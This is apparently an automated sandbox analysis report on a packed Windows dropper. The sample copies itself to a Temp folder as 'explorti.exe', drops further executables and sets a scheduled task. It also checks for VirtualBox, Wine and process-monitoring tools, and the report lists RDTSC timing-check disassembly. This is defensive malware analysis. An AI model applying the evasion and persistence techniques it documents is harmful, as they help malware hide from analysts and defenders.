Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1884672 > 1048576

Source: file.exe

Static PE information: Raw size of mlkfqtwe is bigger than: 0x100000 < 0x19aa00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.850000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 7.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe.7.dr	Static PE information: real checksum: 0x1c9af8 should be: 0x192d6f
Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d392b should be: 0x1d7473
Source: 2c422e6624.exe.7.dr	Static PE information: real checksum: 0x1c9af8 should be: 0x192d6f
Source: file.exe	Static PE information: real checksum: 0x1d392b should be: 0x1d7473

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: mlkfqtwe
Source: file.exe	Static PE information: section name: ezviljwn
Source: file.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: mlkfqtwe
Source: explorti.exe.0.dr	Static PE information: section name: ezviljwn
Source: explorti.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: agodkpeb
Source: random[1].exe.7.dr	Static PE information: section name: frgsmfqf
Source: random[1].exe.7.dr	Static PE information: section name: .taggant
Source: 2c422e6624.exe.7.dr	Static PE information: section name:
Source: 2c422e6624.exe.7.dr	Static PE information: section name: .rsrc
Source: 2c422e6624.exe.7.dr	Static PE information: section name: .idata
Source: 2c422e6624.exe.7.dr	Static PE information: section name:
Source: 2c422e6624.exe.7.dr	Static PE information: section name: agodkpeb
Source: 2c422e6624.exe.7.dr	Static PE information: section name: frgsmfqf
Source: 2c422e6624.exe.7.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_00A1D84C push ecx; ret

7_2_00A1D85F

Source: file.exe	Static PE information: section name: entropy: 7.988355421365411
Source: file.exe	Static PE information: section name: mlkfqtwe entropy: 7.953079364825396
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.988355421365411
Source: explorti.exe.0.dr	Static PE information: section name: mlkfqtwe entropy: 7.953079364825396
Source: random[1].exe.7.dr	Static PE information: section name: agodkpeb entropy: 7.953767082543736
Source: 2c422e6624.exe.7.dr	Static PE information: section name: agodkpeb entropy: 7.953767082543736

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D33 second address: A26D3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D3D second address: A26D45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D45 second address: A26D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26D49 second address: A26D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007FA934C8B32Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C8C4 second address: A3C8D4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA9347D66B6h 0x00000008 jno 00007FA9347D66B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C8D4 second address: A3C8F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FA934C8B342h 0x0000000f jmp 00007FA934C8B32Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3C8F8 second address: A3C8FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CA65 second address: A3CA69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CA69 second address: A3CA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CBD9 second address: A3CC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007FA934C8B326h 0x0000000d jmp 00007FA934C8B336h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jno 00007FA934C8B326h 0x0000001c jmp 00007FA934C8B32Bh 0x00000021 jo 00007FA934C8B326h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CC18 second address: A3CC1F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CD7D second address: A3CD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CD81 second address: A3CD97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA9347D66BCh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CF23 second address: A3CF2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3CF2B second address: A3CF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D0B4 second address: A3D0B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D0B8 second address: A3D0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA9347D66B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA9347D66BAh 0x00000013 jmp 00007FA9347D66BEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D0DE second address: A3D0E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D0E2 second address: A3D0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA9347D66C4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D0FC second address: A3D108 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA934C8B32Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3D268 second address: A3D270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EC58 second address: A3EC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EC5E second address: A3ECB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov esi, dword ptr [ebp+122D1898h] 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D3824h] 0x0000001c call 00007FA9347D66B9h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FA9347D66C2h 0x00000029 jbe 00007FA9347D66B6h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3ECB1 second address: A3ECDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FA934C8B326h 0x00000009 jmp 00007FA934C8B332h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FA934C8B326h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3ECDA second address: A3ECDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3ECDE second address: A3ECE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3ECE4 second address: A3ED0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA9347D66BEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jp 00007FA9347D66B8h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3ED0A second address: A3EDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FA934C8B32Dh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 jno 00007FA934C8B328h 0x0000001a pop eax 0x0000001b pop eax 0x0000001c adc esi, 1266201Fh 0x00000022 push 00000003h 0x00000024 and dx, C52Bh 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c stc 0x0000002d pop ecx 0x0000002e push 00000003h 0x00000030 pushad 0x00000031 mov edi, 43CD63BBh 0x00000036 add edi, 1D27A928h 0x0000003c popad 0x0000003d jl 00007FA934C8B337h 0x00000043 call 00007FA934C8B32Ah 0x00000048 mov dword ptr [ebp+122D2339h], ebx 0x0000004e pop edx 0x0000004f push 88F41B54h 0x00000054 jmp 00007FA934C8B32Ch 0x00000059 add dword ptr [esp], 370BE4ACh 0x00000060 xor dword ptr [ebp+122D3649h], ebx 0x00000066 lea ebx, dword ptr [ebp+12453B4Fh] 0x0000006c jmp 00007FA934C8B334h 0x00000071 xchg eax, ebx 0x00000072 push eax 0x00000073 push edx 0x00000074 jl 00007FA934C8B328h 0x0000007a pushad 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EDAB second address: A3EDBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jbe 00007FA9347D66B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EDBF second address: A3EDC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EDC3 second address: A3EDDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EE5B second address: A3EED1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FA934C8B328h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 movsx esi, dx 0x00000029 push 00000000h 0x0000002b call 00007FA934C8B329h 0x00000030 push ebx 0x00000031 jmp 00007FA934C8B335h 0x00000036 pop ebx 0x00000037 push eax 0x00000038 jmp 00007FA934C8B334h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EED1 second address: A3EEE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA9347D66BBh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EEE4 second address: A3EEF6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jc 00007FA934C8B32Eh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EEF6 second address: A3EF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EF04 second address: A3EF64 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jns 00007FA934C8B328h 0x0000000e push 00000003h 0x00000010 push esi 0x00000011 sub di, E293h 0x00000016 pop esi 0x00000017 and ecx, 4ACC2200h 0x0000001d push 00000000h 0x0000001f call 00007FA934C8B336h 0x00000024 mov di, dx 0x00000027 pop esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3808h] 0x00000030 call 00007FA934C8B329h 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA934C8B332h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3EF64 second address: A3EFE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA9347D66BEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jp 00007FA9347D66C4h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jno 00007FA9347D66D2h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jns 00007FA9347D66BCh 0x0000002a pop eax 0x0000002b mov cx, 0234h 0x0000002f lea ebx, dword ptr [ebp+12453B58h] 0x00000035 mov cx, FC25h 0x00000039 xchg eax, ebx 0x0000003a jbe 00007FA9347D66C4h 0x00000040 pushad 0x00000041 js 00007FA9347D66B6h 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F076 second address: A3F07A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F07A second address: A3F0C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b add dword ptr [esp], 769624BAh 0x00000012 call 00007FA9347D66BDh 0x00000017 mov dword ptr [ebp+122D34C6h], edi 0x0000001d pop edx 0x0000001e push 00000003h 0x00000020 mov dword ptr [ebp+122D1908h], edx 0x00000026 push 00000000h 0x00000028 add dword ptr [ebp+122D34F4h], eax 0x0000002e push 00000003h 0x00000030 mov si, dx 0x00000033 push 833EB5ECh 0x00000038 push ecx 0x00000039 jl 00007FA9347D66BCh 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F0C3 second address: A3F121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xor dword ptr [esp], 433EB5ECh 0x0000000c jp 00007FA934C8B32Ch 0x00000012 lea ebx, dword ptr [ebp+12453B63h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FA934C8B328h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 xchg eax, ebx 0x00000033 jnp 00007FA934C8B334h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F121 second address: A3F125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
